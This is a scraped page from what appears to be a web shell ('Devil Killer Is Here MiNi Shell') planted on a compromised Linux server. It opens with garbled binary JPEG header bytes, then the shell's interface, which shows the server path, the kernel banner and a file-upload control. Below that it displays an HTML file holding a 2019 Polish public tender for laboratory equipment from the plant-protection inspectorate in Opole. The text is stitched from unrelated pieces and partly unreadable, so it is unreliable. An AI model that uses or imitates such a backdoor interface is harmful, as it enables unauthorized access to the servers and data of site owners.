JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190329/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190329/531553-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 531553-N-2019 z dnia 2019-03-29 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Wojewódzki Inspektorat Ochrony Roślin i Nasiennictwa w Opolu</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">ZAKUP SPRZĘTU LABORATORYJNEGO DLA LABORATORIUM WOJEWÓDZKIEGO NA POTRZEBY WIORiN W OPOLU W 2019 ROKU</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie nieobowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Wojewódzki Inspektorat Ochrony Roślin i Nasiennictwa w Opolu</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00000000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Wrocławska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">172</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">45-851</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Opole</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">opolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">077 474-46-19; 457-55-39</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">da-opole@piorin.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">077 474-46-19; 457-55-39</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">https://piorin.gov.pl/wiorin/opolskie/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja rządowa terenowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://piorin.gov.pl/wiorin/opolskie/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Tak</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny">Za pośrednictwem operatora pocztowego, osobiście lub za pośrednictwem posłańca - kuriera</span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Wojewódzki Inspektorat Ochrony Roślin i Nasiennictwa w Opolu 45-835 Opole, ul. Wrocławska 172</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">ZAKUP SPRZĘTU LABORATORYJNEGO DLA LABORATORIUM WOJEWÓDZKIEGO NA POTRZEBY WIORiN W OPOLU W 2019 ROKU</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">WAD.272.3.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">4</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem postępowania jest zakup i dostawa w roku 2019 fabrycznie nowego (wcześniej nie używanego, bez śladu uszkodzeń i użytkowania) sprzętu laboratoryjnego dla Laboratorium Wojewódzkiego na potrzeby WIORiN w Opolu w ilościach i asortymencie wymienionym w załączniku nr 2a, 2b, 2c, 2d do specyfikacji istotnych warunków zamówienia (zwanej w dalszej części SIWZ) pogrupowanych w czterech pakietach obejmujących odpowiednio:Pakiet	I - jeden mikroskop biologiczny (załącznik 2a). Warunki techniczne i wyposażenie:	Wymagania:Stan mikroskopu/ rok produkcji	Fabrycznie nowy , rok produkcji 2019Optyka	o	Korygowana do nieskończonościStatyw	o	Uchwyt rewolwerowy obiektywów min. 6 gniazdowy z osobnymi gniazdami na suwaki kontrastu Nomarskiego dla każdego obiektywuo	Możliwość wbudowania w statyw portu bocznego dla kamery cyfrowej zapewniającego podział światła pomiędzy okulary i kamerę w stosunku 50% : 50% albo 100% : 0% / 0% : 100%o	Współosiowe śruby mikro/makro do ustawiania ostrości, położone na jednej wysokości z pokrętłami sterowania stolikiem, o	Blokada ostrości, pozwalająca na zapamiętanie pozycji ostrościo	Statyw wyposażony w klasyczny kontrast Nomarskiego/DIC oraz opcjonalnie w kontrast fazowyo	Możliwość rozbudowy o kontrast Nomarskiego z regulacją siły kontrastu widzenia, dostosowany do pracy z plastikowymi naczynkami hodowlanymio	Koło filtrów do światła przechodzącego, minimum 6-cio pozycyjne z filtrami neutralnymi oraz filtrem konwersyjnymo	Możliwość rozbudowy o fluorescencję LEDOświetlacz halogenowy	o	Oświetlacz halogenowy minimum 50 WATTubus	Szerokopolowy tubus binokularowy z portem kamery (podział światła 50:50%), z regulacją rozstawu źrenic w zakresie 55 ... 74 mm, kąt 30 stopni, pole widzenia min 23 mmOkulary	o	Powiększenie 10xo	Szerokopolowe, pole widzenia min. 23 mmObiektywy o	5x / apertura 0,12, planachromat, odl. robocza 10,1 mmo	10x / apertura 0,25, planachromat, odl. robocza 4,5 mmo	20x / apertura 0,45, planachromat, odl. robocza 0,46 mmo	40x / apertura 0,75, semiplanapochromat, kontrast Nomarskiego/DIC, odl. robocza 0,17 mmo	100x / apertura 1,30, semiplanapochromat, immersja olejowa, kontrast Nomarskiego/DIC, odl. robocza 0,20 mm	Stolik	o	Posuw preparatu w osiach X i Y (ukryte prowadnice)o	Regulowana siła obrotu pokręteł w osiach X i YKondensor	o	Kondensor N.A. 0,9 z regulowaną przysłoną aperturową, do obserwacji z obiektywami 2,5x ... 100x, w pełni centrowalny, wyposażony do kontrastu fazowego, ciemnego pola i kontrastu Nomarskiego/DICKamera cyfrowa kolorowa	o	Rozdzielczość co najmniej: 2560 (H) x 1920 (V) = 5 Megapikselio	Digitalizacja: 3 x 8 bitówo	Czas integracji: od 0,1 ms do 2 so	Interface: USB 3.0o	Oprogramowanie do akwizycji obrazu zapewniające obróbkę obrazu i podstawowe pomiaryWyposażenie	o	Zestaw ochronny antystatyczny (pokrowiec, osłony gumowe na okulary oraz źródło światła)o	Zestaw narzędziGwarancja minimum	o	12 miesięcyPakiet II - jeden sterylizator parowy pionowy (załącznik 2b).Warunki techniczne i wyposażenie:	Wymagania:Stan sterylizatora/ rok produkcji	Fabrycznie nowy, rok produkcji 2019Sterylizator z komorą sterylizacyjną pionową TakPojemność użytkowa komory 80 litrów ?5%	TakŚrednica komory: > 410 mm - 10 pkt.< 410 mm - 0 pkt.	TakRama i obudowa wykonane ze stali nierdzewnej nie gorszej niż 304 wg. AISI	TakObudowa drzwi sterylizatora bez wystających elementów	TakSterylizator wyposażony w skrętne kółka z blokadami szt. 4	TakKomora, płaszcz komory, drzwi komory, wytwornica pary wykonane ze stali nierdzewnej nie gorszej niż 316 L wg. AISI	TakTemperatura sterylizacji programowana w zakresie 103-136 °C	TakRegulacja temperatury w zakresie całkowitym 60-136 °C	TakFunkcja aparatu Kocha (100°C) oraz funkcja upłynniania agaru (60°C) TakCiśnieniowa wbudowana wytwornica pary wykonana ze stali nierdzewnej 316L wg AISI. Wytwornica oddzielona od komory sterylizacyjnej	TakWbudowany dodatkowy czujnik temperatury w komorze ( sonda giętka) PT100	TakZamykanie pokrywy zamkiem napędzanym silnikiem elektrycznym. W zamku blokada temperaturowa	TakWspomaganie otwierania drzwi sterylizatora za pomocą sprężyny gazowej, drzwi otwierane do pionu TakUszczelka rozprężana parą	TakAutomatyczne czyszczenie wytwornicy pary na koniec każdego cyklu TakSterowanie mikroprocesorowe	TakWszystkie komunikaty na wyświetlaczu w języku polskim	TakWbudowana pompa próżniowa, dostępne próżnia frakcjonowana i suszenie próżniowe	TakWyświetlanie komunikatów o zaistniałych awariach	TakRozwiązania gwarantujące dostęp do ustawień sterylizatora według stopnia kompetencji personelu	TakW pełni automatyczna realizacja wszystkich programów sterylizacyjnych.	TakProgramy sterylizacyjne - min. 18 programów	TakProgramy sterylizacyjne z możliwością zmiany parametrów	TakDostęp do menu zmiany programów zabezpieczony kodem	TakSystem chłodzenia zrzutu kondensatu do wartości bezpiecznej dla instalacji kanalizacyjnej	TakMożliwość dokonywania zmian w ustawieniach parametrów sterylizacji przez użytkownika	TakWłącznik czasowy cyklu ( program uruchamia się po wcześniejszym ustawieniu daty i godziny startu ) TakMożliwość wbudowana drukarki parametrów sterylizacji z wydrukiem na zwykłym papierze (trwałe wydruki)	TakKomora wyposażona w port walidacyjny	TakStacja odwróconej osmozy do zasilania wytwornicy pary	TakZasilanie elektryczne min.: 6 kW/400V	TakKosz sterylizacyjny wykonany z siatki nierdzewnej na  1/2  załadunku komory szt. 1, Kosz pełny ze stali nierdzewnej na  1/2  załadunku szt. 1	TakŚrednie zużycie wody demineralizowanej na cykl max: 4 l	TakZużycie wody chłodzącej do chłodzenia kondensatu max.10 l wody wodociągowej zdatnej do picia.	TakGwarancja i serwis.:	Gwarancja minimum 12 miesięcy	TakKoszt przeglądów serwisowych (min. 1 x w roku) w trakcie gwarancji	PodaćKoszt materiałów zużywalnych w trakcie gwarancji	PodaćKoszt dojazdu serwisanta	PodaćPakiet III - dwie chłodziarko - zamrażarki laboratoryjne (załącznik 2c).Warunki techniczne i wyposażenie:	Wymagania:Stan chłodziarko - zamrażarek Fabrycznie nowe, rok produkcji 2019Wymiary zewnętrzne (wys. x szer. x gł.) mm	1870x600x600Wymiary wewnętrzne (wys. x szer. x gł.) mm	Chłodziarka: 805x510x430,Zamrażarka: 780x463x445Pojemność brutto (chłodziarka/zamrażarka), L	324 (190/134)Pojemność netto, L	302Wykończenie zewnętrzne BiałeKolor	Biały/zielonyWykończenie wnętrza	TworzywoTyp tworzywa	SRL800 (HIPS/ABS mix)Typ drzwi Pełne, przestawneCzujnik otwartych drzwi	TakZamek	TakRegulowane nóżki	2 przednie, 2 tylne rolkiZakres temperatury °C Chłodziarka: +2 do +8zamrażarka: -18 do -25Wyświetlacz temperatury na panelu	TakAlarm temperatury	TakLiczba półek	3Formowane szuflady	2Regulowane pojemniki na drzwiach	2 pełne, 4 półkoweŚwiatło wewnętrzne	WskazaneRozmrażanie	Chłodziarka: automatyczneZamrażarka: ręczneCzynnik chłodzący	R600aWolny od CFC, HFC, HCFC	TakNapięcie, V	230Typ izolacji	CyklopentanGrubość izolacji, mm	60Regulacja temperatury	Z dokładnością do 0,1°CGwarancja minimum	12 miesięcy.Pakiet III - jedna cieplarka laboratoryjna (załącznik 2c).Warunki techniczne i wyposażenie:	Wymagania:Stan cieplarki	Fabrycznie nowa, rok produkcji 2019Wymiary zewnętrzne (wys. x szer. x gł.) mm	2020x520x700Pojemność brutto	350Pojemność netto	335Kolor	Basic/Basic+/INOX/INOX+Ilość półek	3Zakres temperatur	+3°C do +40°CNapięcie zasilania 230V / 50HzMoc znamionowa 280Masa (kg)	100-105Drzwi	Pełne z samozamykaczem i zamkiemObieg powietrza	wymuszonyJednorodność oraz stabilność temperatury	+/- 0,7°CRegulacja temperatury	Co 0,1°C za pomocą sterownika mikroprocesorowegoAlarm uszkodzenia czujnika temperatury	TakOświetlenia wnętrza świetlówką WskazaneGwarancja minimum	12 miesięcyPakiet IV - jedna zmywarka do naczyń z funkcją wyparzania (załącznik 2d).Warunki techniczne i wyposażenie:	Wymagania:Stan zmywarki	Fabrycznie nowa, rok produkcji 2019Wymiary zewnętrzne (wys. x szer. x gł.) mm	836x565x636Napięcie - U	400VMoc elektryczna	6.5 kWFunkcja wyparzania	TakSterowanie elektroniczne	TakFiltr powierzchniowy	TakPrzystosowana do mycia tac GN 1/1	TakJelitowy dozownik płynu myjącego i nabłyszczającego	TakCzas trwania cyklu	90/120/180 sek.Wskaźnik temperatury pracy bojlera i komory	Tak2 pary ramion myjąco-płuczących (góra/dół)	TakZużycie wody 2,5 l/cyklMaksymalna wysokość mytego naczynia	320 mmKosz 500x500 mm	TakGwarancja minimum	12 miesięcyCPV: 38510000-3 Mikroskopy pakiet ICPV: 33191100-6 Urządzenia sterylizujące pakiet II CPV: 39711110-3 Chłodziarko - zamrażarki pakiet IIICPV 38000000-5 Sprzęt laboratoryjny pakiet IIICPV: 39713100-4 Zmywarka do naczyń pakiet IVWydanie sprzętu laboratoryjnego (mikroskop biologiczny, sterylizator parowy pionowy, chłodziarko - zamrażarki laboratoryjne - 2 szt, cieplarka laboratoryjna, zmywarka z funkcją wyparzania) wraz z oryginałami dokumentów wystawionych na przedmiot umowy, takich jak karty gwarancyjne i dokumenty obsługi serwisowej nastąpi w siedzibie Zamawiającego przy ul. Wrocławska 172, 45-835 Opole.2)	Przedmiot zamówienia: ?	Będzie fabrycznie nowy ?	Będzie własnością Wykonawcy.?	Będzie wolny od wad fizycznych oraz prawnych.?	Nie będzie obciążony prawami osób trzecich, nie jest przedmiotem jakiegokolwiek postępowania lub zabezpieczenia.3)	Wykonawca, wraz z sprzętem laboratoryjnym (mikroskop biologiczny, sterylizator parowy pionowy, chłodziarki laboratoryjne - 2 szt, cieplarka laboratoryjna, zmywarka z funkcją wyparzania) przekaże Zamawiającemu dokumenty gwarancyjne.Bieg terminu gwarancji rozpoczyna się z dniem podpisania przez upoważnionego przedstawiciela Zamawiającego protokołu odbioru sprzętu laboratoryjnego (mikroskop biologiczny, sterylizator parowy pionowy, chłodziarko - zamrażarki laboratoryjne - 2 szt, cieplarka laboratoryjna, zmywarka z funkcją wyparzania) bez zastrzeżeń.4)	W przypadku reklamacji Wykonawca zobowiązany jest dokonać napraw i wymiany części w stacji serwisowej Wykonawcy lub innej - wskazanej Zamawiającemu pisemnie w terminie nie przekraczającym 14 dni roboczych liczonych od dnia zgłoszenia reklamacji.W sytuacji, kiedy w okresie udzielonej przez Wykonawcę gwarancji usterka lub wada dotyczyć będzie tego samego podzespołu lub części trzykrotnie Wykonawca wymieni wadliwy sprzęt laboratoryjny (mikroskop biologiczny, sterylizator parowy pionowy, chłodziarko - zamrażarki laboratoryjne - 2 szt, cieplarka laboratoryjna, zmywarka z funkcją wyparzania) na inny bez wad.Za jeden dzień roboczy należy rozumieć jeden dzień urzędowania Wojewódzkiego Inspektoratu (od poniedziałku do piątku w godzinach 7.30-15.30 z wyłączeniem dni ustawowo wolnych od pracy określonych w art.1 ust. 1 Ustawy z dnia 18.01.1951r. o dniach wolnych od pracy (tekst jednolity Dz. U. 2015r. poz. 90).5)	Przedmiot umowy obejmuje także:a)	Dostawę sprzętów laboratoryjnych (mikroskop biologiczny, sterylizator parowy pionowy, chłodziarko - zamrażarki laboratoryjne - 2 szt, 